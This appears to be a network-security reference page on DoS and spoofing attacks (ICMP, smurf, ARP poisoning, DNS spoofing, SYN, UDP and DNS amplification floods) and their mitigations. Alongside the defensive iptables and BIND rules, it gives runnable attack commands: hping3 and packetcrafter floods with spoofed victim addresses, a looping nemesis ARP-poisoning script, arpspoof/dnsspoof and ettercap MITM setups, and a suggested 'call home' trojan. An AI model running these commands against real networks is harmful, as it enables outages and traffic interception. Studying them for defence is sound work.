Malicious packets are used to Exploit the computer's Vulnerabilities

When you send out malicious packets, you probably want to know it was
received by the Victims
o you'd need to watch your work and the packets as you progress thru your
attack
o you'd need a good sniffer
o you'd need a good understanding of the data the sniffer shows you

there are over a million different virus but not as many worms ...
o virus usually attaches itself to emails and require people to propagate it
Don't click on email attachments and you probably will NOT get
infected with virus
o worms does NOT need people and can simply propagate and infect
computers on its own

Generating Custom DDoS Packets

Various Packet Crafting Apps are readily available
o http Flood, ICMP Flood, SMTP flood, SSH Flood, UDP flood, etc

Live Online Packet Crafting Demo

o bsd.Packet-Craft.net/Demo Demo DDoS GUI
just enter your destinationIP in the GUI for a quick demo

o Generate 1,000,000 arp packets at 10,000 packets/sec ( ARP flood )
packetcrafter.pl -skip -cli -arp -src spoofVictimIP -dst zombieIP -c
1000000 -i 0.0001

o Generate 1,000,000 icmp packets at 10,000 packets/sec ( ICMP flood )
packetcrafter.pl -skip -cli -icmp -src spoofVictimIP -dst zombieIP -c
1000000 -i 0.0001

o Generate 1,000,000 udp packets at 10,000 packets/sec ( UDP flood )
packetcrafter.pl -skip -cli -udp -src spoofVictimIP -dst zombieIP -c
1000000 -i 0.0001

Other Bandwidth Flooding methodologies

Denial-of-Service Overview

Juniper.net DOS Attacks
Juniper.net DOS Detection and Prevention

Juniper.net Network DoS Attacks
Juniper.net ICMP Flood Attacks
Juniper.net LAND Attacks
Juniper.net SYN Flood Attacks
Juniper.net UDP Flood Attacks
Juniper.net SYN Cookie protection
Juniper.net Firewall DoS Attacks
Juniper.net Attacker Evasion Techniques




ICMP Attacks

non-ICMP Ping Attacks
Ping Attacks
o ICMP DOS attack
Attacker sends ICMP "time exceeded" or "destination unreachable" to
both victims

o ICMP Sweeps
Attacker sends icmp request to the entire network and deduce OS
types from icmp replies
use TTL option, nmap, superscan, traceroute ..
o
o Ping flood attack
gazillion different ways to do this

o Ping of Death
The Attacker sends a packet size > target OS MTU
which the OS cannot reassemble and crashes ( Windows-95,
Windows-98 )
Packet Size > 65,535 was fixed in linux-2.0.24
ping -s 65536 VictimIPAddress

o Ping Nuke attack ( aka Blue Screen for Windows 95, NT and 3.1X )

Minimize ICMP Attacks
o ICMP and UDP attacks cannot be prevented ... it is stateless
the packets will come down the pipe regardless of what you do or
dont do
you can stop the icmp/udp flood attacks by telling your ISP to drop
the packets at their end of your pipe

you can NOT tarpit incoming ICMP/UDP packets
you can define connection limits for incoming ICMP/UDP packets
you can define bandwidth limit for incoming ICMP/UDP packets

ICMP Smurf Attacks



The trick for Smurf Attacks is to find PCs that are misconfigured and allows
"broadcast ping"
o Some of the misconfigured networks are listed at Smurf Amplifier Registry

The Attacker tells lots of machines to send ICMP echo replies to the
VictimIPAddress, probably slowing down your internet connectivity to a crawl
o for best effect, you'd send your icmp request to a smurf broadcast amplifier
o your outgoing icmp request should have the "spoofed source address" as
VictimIPAddress ( whom didn't send the initial ping request )

#
# in the best case, you should NOT get any replies for doing a "ping
broadcast"
# it's a BAD thing to get replies for "ping broadcasts"
linux# ping -b 192.168.255.255
bsd# ping 192.168.255.255

#
# up to 64,000 (misconfigured) hosts could reply by sending a ping reply to
the VictimIPAddress
sing -echo -s 1024 -S VictimIPAddress 192.168.255.255

hping3 -1 --flood -a VictimIPAddress 192.168.255.255

nemesis icmp I 8 S 192.168.1.10 D 192.168.255.255

For Smurf Attack Testing Purposes only
o for smurf testing, allow icmp broadcast on some of your non-critical
computers
#
# each of these PCs will reply to the incoming ping broadcast
echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts -- for
smurf testing
o for smurf testing, allow ping broadcasts thru your firewall

Preventing Smurf Attacks
o Check for computers, routers, printers, etc that reply to broadcast ping
ping -b 192.168.255.255
ping -b 192.168.0.0
nmap -n -sP -PI -o /tmp/smurf.log 'w.x.y.z/24'

o turn off icmp broadcast on ALL your computers, routers, printers, etc
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts

o change your firewall rules
OregonTechSupport.com detailed iptable rules for ICMP ( local
copy )
Allow OUTbound Echo Request
Allow inbound Echo Reply messages
Allow inbound Traceroute TTL-Exceeded
Allow inbound Port Unreachable messages
Allow inbound Path MTU messages
Allow inbound Fragmentation-DF-Set messages
iptables -A INPUT -p icmp -m icmp --icmp-type address-mask-
request -j DROP
iptables -A INPUT -p icmp -m icmp --icmp-type timestamp-request -j
DROP
iptables -A INPUT -p icmp -m icmp -m limit --limit 1/second -j
ACCEPT

non-ICMP Ping Attacks
arping
tcping
udpping, echoping
Fraggle attack
o Fraggle uses UDP instead of icmp
o Fraggle uses specific ports

nemesis -udp -x echo -y chargen -S 192.168.0.1 -D 192.168.0.2

ARP Attacks ( ARP Spoofing, ARP Poisoning, ARP Cache Poisoning )

WikiPedia.org ARP Spoofing


grc.com nice simple pix ( local copy )

blog.zorinaq.com
# victim# arp who-has 10.2.32.1 tell 10.2.44.90
# Attacker# runs nemesis
nemesis arp -h 00:de:ad:be:ef:00 -S 10.2.44.90 -m 0:0:0:0:0:0 -D 10.2.32.1 -M
00:30:48:xx:xx:xx

daviddodd.sys-con.com same as admin-magazine.com
Admin-Magazine.com Arp-Cache-Poisoning-and-Packet-Sniffing
while true
do
#
# keep it poisoned .. refresh victim's arp every 10 seconds
#
nemesis arp -v -r -d eth0 -S 192.168.1.2
-D 192.168.1.133 -h 00:22:6E:71:04:BB -m 00:0C:29:B2:78:9E
-H 00:22:6E:71:04:BB -M 00:0C:29:B2:78:9E
#
# tell the other side too
nemesis arp -v -r -d eth0 -S 192.168.1.133
-D 192.168.1.2 -h 00:22:6E:71:04:BB -m 00:22:6B:7E:AD:7C
-H 00:22:6E:71:04:BB -M 00:22:6B:7E:AD:7C
#
sleep 10
done

WordPress.com ARP Cache Poisoning
arpspoof -i eth0 -t victimIP gatewayIP
arpspoof -i eth0 -t gatewayIP victimIP
sysctl -w net.ipv4.ip_forward=1

usc.edu ARP spoof Lab
#
# sniff data between 10.1.1.2 and 10.1.1.6
ettercap -T -M arp /10.1.1.2/ /10.1.1.6/

WatchGuard.com ARP Cache Poisoning
create an ARP reply packet with any arbitrary IP# and the Attacker's MAC address
all packets will now come to the Attacker's computer configured for faked/hijacked IP#
(victim)
ARP Poisoning to implement Denial of Service ( DOS ) Attack
o when your gateway router accept the fake ARP reply packet, you are now offline

ARP Poisoning to implement Man-in-the-Middle ( MITM ) Attack
o the Attacker sends an ARP reply to the router with the victim IP# and Attacker's
MAC address
o the Attacker sends an ARP reply to the victim with the router IP# and Attacker's
MAC address
o all packets between victim and router will now come to hackeer's computer

ARP Poisoning to implement MAC Flooding Attack
o the Attacker sends thousands of fake arp reply to the victim ( routers, switches,
PCs )

Minimize Problems from ARP Spoofing
the Attacker will probably need to be inside the local LAN to carry out an arp poisoning
attack
o the Attacker can gain local LAN access if there's a misconfigured and insecure
router/gateway/servers/firewalls
o the Attacker can gain local LAN access if there's a misconfigured and insecure
wifi access point
o the Attacker can gain local LAN access by dropping a trojan horse into the
victims PC while they are at insecure internet cafe, airports, hotels, etc
it can be as simple and fun as "call home" via cron and/or startup scripts
each time the victim is booted

use S-ARP ( secure ARP ) instead
ArpON ( Arp handler inspectiON )
ARPDefender ( commercial appliance )
XArp
install ARP monitoring packages .. eg ARPwatch
configure your firewall with ip# and MAC address pairs
check your log files ( /var/log/messages )
disallow DHCP that allows "anybody" into your LAN
disallow wifi connectivity that allows "anybody" into your LAN
Use static routes, static entries cannot be updated by ARP replies
o protect switches, gateways with static routes
o protect login servers, mail servers, web servers with static routes

for all routers, switches, PCs and devices on the LAN, add an entry into the static arp
table
o arp -s hostname mac_addr
o arp -d ip_address # to delete an address

make sure your switch allows only 1 MAC address per port, but it can also be the
Attacker's MAC address too
make sure your switch does NOT drop to "hub" mode
make sure your switch has "sticky arp" enabled
disable un-used ports on your switch

DNS Attacks ( DNS Spoofing, DNS Cache Poisoning )

Packet-Craft.net/Malicious/#DNSamp DNS Amplication Attacks

Wikipedia.org DNS Spoofing
MenandMice.com nice spoof pix
Secure.MenandMice.com offline DNS test via email
GRC.com DNS Spoofability ( live online test )

wordPress.com DNS Spoofing
cat spoofhosts.txt
192.168.1.100 mail*
192.168.1.100 www*

echo 1 > /proc/sys/net/ipv4/ip_forward (enable port forwarding)
arpspoof -t 192.168.1.245 192.168.1.5
arpspoof -t 192.168.1.5 192.168.1.245
dnsspoof -f spoofhosts.txt host 192.168.1.245 and udp port 53

blogspot.com
o vi ../ettercap/etter.dns
#
# example spoofing microsoft
"microsoft.com A 198.182.196.56
*.microsoft.com A 198.182.196.56
www.microsoft.com PTR 198.182.196.56"
#
# example spoof google
"google.com A 64.148.32.238
*.google.com A 64.148.32.238
www.google.com PTR 64.148.32.238"
#
# End of etter.dns

o Run ethercap in text mode quietly dns-spoofing as Man-in-The-Middle for all
hosts
ettercap -T -q -i eth0 -P dns_spoof -M arp // //

jon.oberheide.org .. DNS spoofing w/ python + dpkt
# udp dst port 53 for DNS
pc = pcap.pcap()
pc.setfilter('udp dst port 53')

... long list of commands ..

coode.Google.com dnsspoof.cpp
requires LibCrafter library

Minimize Problems from DNS Spoofing
o see minimize ARP spoofing
o use latest version of BIND
o run DNS in chroot environment
o Enable DNSsec
o Run IPSEC
o DNS servers should disallow arbitrary zone transfers
o Install Network Monitors ( might be too late )
o hard code important IP# ( eg. banks.com ) into /etc/hosts ( but, it can be trojaned
)

Corpocrat.com Securing your DNS Server

GIAC.org Practical Perl for Security

NetWidget.net Measures to prevent DNS spoofing
dn9a.nl DNS Anti Spoofing

LAND Attacks ( banana attack )

send a spoofed TCP SYN packet to the victim IP address
the source and destination address is the same as the victim

hping -S -a w.x.y.z -p 21 w.x.y.z


hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VictimIP

hping3 -S VictimIP -a VictimIP -k -s 139 -p 139 --flood

MAC Flood attack

primarily worrisome for routers and switches
Some switches drop back into hub mode when it's arp cache is overloaded

Man in the Middle Attacks ( MiTM )

Intern0t.org ARP Poisining - MiTM
#
# to become the MiTM and cause havoc:
ettercap -Tq -M arp:remote w.x.y.z -P autoadd vi filter.pic
etterfilter filter.pic -o filter.ef
ettercap -T -q -F filter.ef -M arp:remote w.x.y.z -P autoadd

Packet Fragmentation Attack

Packet Size > 65,535 was fixed in linux-2.0.24
aka various forms of the infamous "ping of death"
Sends packet size of 1501 > MTU ( 1500 ) and set Do NOT Fragment flag
Sends packet size of 1501 > MTU ( 1500 ) and do NOT set More Fragment flag
Sends packet size of 1499 < MTU ( 1500 ) and set More Fragment flag
Sends packets with same Src and Dst Address ( aka LAND attack )

Tech-Faq.com
1st Packet: Dont Fragment = 0 + More Fragment = 1 + Fragment Offset = 0 to
port 25
2nd Packet: Dont Fragment = 0 + More Fragment = 0 + Fragment Offset = 1 to
port 25
2nd packet overwrote 1st packet's data

SYN Flood Attack

Normally, you send out a packet with SYN and wait for ACK replies
o Each packet received consumes system memory and could go into the OS's
backlog queue

The Attacker will send huge number ( hundreds, thousands ) of packets with SYN flag set
to the TargetHost
o you will need to know the size of the tcp connections backlog queue
o you will need to know the time out period for the tcp connections

# -a is spoofed sourced address, send 1000 SYN packets/sec to Victim
hping -a SpoofedSrc -S VictimIP -p 80 -i u1000

TCP Reset Flood Attack

the Attacker sends a RST packet to either or both victim hosts

TCP Sequence Number Attack ( TCP Session Hijacking )

Normal TCP sequence of events
o HostA send SYN packet to HostB
o HostB reply to HostA with SYN + ACK flags and ACKnumber = HostA
SequenceNumber+1
o HostA send SYN + ACK flags and Acknumber = HostB SequenceNUmber+1

TCP Sequence Attacks
o the Attacker floods HostB ( stop it for a while ) and
o the Attacker sends the expected ACKnumber back to HostA and
the Attacker sends a RST to HostB and the Attacker taking HostB's place

gulker.com mitnick - shinomura ( local copy )

DNS ( UDP ) Amplification Attacks

Packet-Craft.net/Malicious/#DNSspoof DNS spoof Attacks
DNS Amplication basically consists of
o Attacker sends out a typical dns request ( udp packet ), "where is
www.example.com"
but the attacker uses a spoofed source addres belonging to Victim
o these spoofed DNS requests are sent to open dns resolver ( recursion allowed
for everybody )
o the amplification can be more effective by using DNS servers that support udp
packets > 512 bytes
o the Victim receives tons of replies for "where is www.example.com"

Nirlog.com DNS Amplication
SecurityTNT.com DNS Amplication ( duplicate of Nirlog.com )

Normal DNS Requests ( 7 steps ) DNS Amplification ( 9 steps )


UDP Flood Attack

send udp flood packets to entire Class-B and/or Class-C address range
o send udp flood packets to port 53 which cannot be dropped

send a large number ( 100,000 p/s ) of UDP packets/sec to random ports of the victim
o to fill up available bandwidth
o to use up all resources ( cpu, memory, buffers, etc ) available on the victim

if no app is running on the udp port being attacked,
the victim will send back ICMP packet of "destination unreachable"
o ( self-DOSing ) generating more useless packets filling up the bandwidth
o use iptables to DROP outgoing ICMP "destination unreachable" packets

Minimize UDP Attacks
o ICMP and UDP attacks cannot be prevented ... it is stateless
the packets will come down the pipe regardless of what you do or dont do
you can stop the icmp/udp flood attacks by telling your ISP to drop the
packets at their end of your pipe
you can NOT tarpit incoming ICMP/UDP packets
you can define connection limits for incoming ICMP/UDP packets
you can define bandwidth limit for incoming ICMP/UDP packets

o you should NOT arbitrarily DROP UDP connections with firewalls (eg.
iptables)
udp packets are REQUIRED for dns lookups and replies

o Selectively, try to Limit the incoming UDP packets

# limit number of udp packets accepted per minute after initial
allowed burst of 10
iptables -A INPUT -p udp -d dns.server --dport 53 -m recent
-m limit --limit 1/min --limit-burst 10 -j ACCEPT

# limit number of udp connection at any given time
iptables -A INPUT -p udp -d dns.server --dport 53 -m recent
-m connlimit --connlimit-above 20 -j ACCEPT

# drop udp packets exceeding above the limits, presumably due to UDP
flooding
# CAREFUL .. you can drop legitimate DNS queries
if the above limits are too low for your busy DNS server..
iptables -A INPUT -p udp -d dns.server --dport 53 -j DROP

o To see what services is running that requires UDP packets
lsof -i UDP
udp packets for DNS .. cannot be dropped
udp packets for NFS .. could be dropped if you do NOT use NFS
you can use secure NFS apps
udp packets for ntp .. could be dropped if exact time
synchronization is NOT required
you could use other time sync: ntpdate


Minimizing Effects of UDP flood Attacks against your DNS servers
DDoS udp flood from source port 25345 attacking your dns server port 53 .... aka
isc.org/any attacks

isc.org
MenandMice.com
CloudFlare.com Deep Inside a DNS Amplification DDoS Attack
MiniHowto.eu Protection Against isc.org ANY Attack
use bind-9.4.1-p1 or later
Log Entries indicating an "isc.org attack"
o tcpdump -n '( udp )' and '( dst net w.x.y.z/24 )' and '( dst port 53 )'
# -- hundreds of thousands of these entries --
time stamp IP victimIP.25345 > yourDNSserver.53: 10809+ [1au] ANY?
isc.org. (36)
time stamp IP victimIP.29400 > yourDNSserver.53: 10809+ [1au] ANY?
isc.org. (36)
time stamp IP victimIP.49940 > yourDNSserver.53: 10809+ [1au] ANY?
isc.org. (36)

o bind log entries
o /var/log/messages
o udp-flood.pl script to find any new UDP flooders ( isc.org ) attacking from port
*.25345
350+ zombies have already UDP-flooded our network

Harden your DNS server by Turning Off Recursion
o in /var/log/messages
TimeStamp dnscServer named[]: client victimIP#port: query
(cache)'xxx.Google.com/MX/IN '
these DNS querues should ALL say "denied" in /var/log/messages
if it doesn't show as denied you will need to turn off or
limit recursive dns queries

o vi /var/named/named.conf ...
# Only allow recursive DNS lookups for yourself ( localhost, localnets
and w.x.y.z/24
# all other dns queries for outsiders should all be denied ( not an
open/public dns server )
acl "trusted {
localhost;
localnets;
w.x.y.z/24;
}; # end acl
...
options {
# only ip# and networks listed in "trusted" can do recursive dns
search
recursion yes; # default is to allow recursion
allow-recursion { trusted; };
allow-transfer{ secondary.dns.server; tritiary.dns.server; };
allow-query { any; };
}; # end options

Allow limited number of incoming UDP packets to port 53 to minimize UDP flooding
o simply DROP ALL udp packets from port 25345 ( the ANY isc.org udp flood
attacks )
o simply DROP ALL udp packets from port 29400 ( the ANY isc.org udp flood
attacks )
o simply DROP ALL udp packets from port 49940 ( the ANY isc.org udp flood
attacks )
o these ISC.org DDoS protection rules are productive only when defined at your
uplink at the ISP
if these isc.org IPtables rules is at your firewall at your location
the udp packets used your bandwidth, the bandwidth damage is already
done

o foxpa.ws example IPtables rule defending against isc.org udp floods

iptables -A INPUT -p udp --sport 25345 -d dns.server --dport 53
-m string --hex-string "|03697363036f726700|" --algo bm --to
65535 -j DROP
iptables -A INPUT -p udp --sport 25345 -d dns.server --dport 53
-m string --hex-string "|6973633f6f72673f|" --algo bm --to 65535 -
j DROP

... etc .. etc ..

iptables -A INPUT ... -m limits ... -m connlimits .. -j ACCEPT

o AfriHost.com
iptables -A INPUT -p udp -m udp --dport 53
-m string --hex-string "|0000ff0001|" --algo bm --from 48 --to
65535
-m recent --set --name dnsanyquery --rsource

iptables -A INPUT -p udp -m udp --dport 53
-m string --hex-string "|0000ff0001|" --algo bm --from 48 --to
65535
-m recent --rcheck --seconds 60 --hitcount 5 --name dnsanyquery -
-rsource -j DROP

o github.com
also using -m string --from 50 --algo bm --hex-string '|0000FF0001|'

o JunkemailFilter.com defending against isc.org udp floods
iptables -v -I INPUT 1 -p udp dport 53
-m string --from 50 --algo bm --hex-string "|0000FF0001|" -m
recent --set --name dnsanyquery
iptables -v -I INPUT 2 -p udp dport 53
-m string --from 50 --algo bm --hex-string "|0000FF0001|" -m
recent --name dnsanyquery
--rcheck --seconds 10 --hitcount 3 -j DROP

o MiniHowto.eu Protection Against isc.org ANY Attack
iptables -A INPUT -p udp -m connlimit connlimit-above xx -j DROP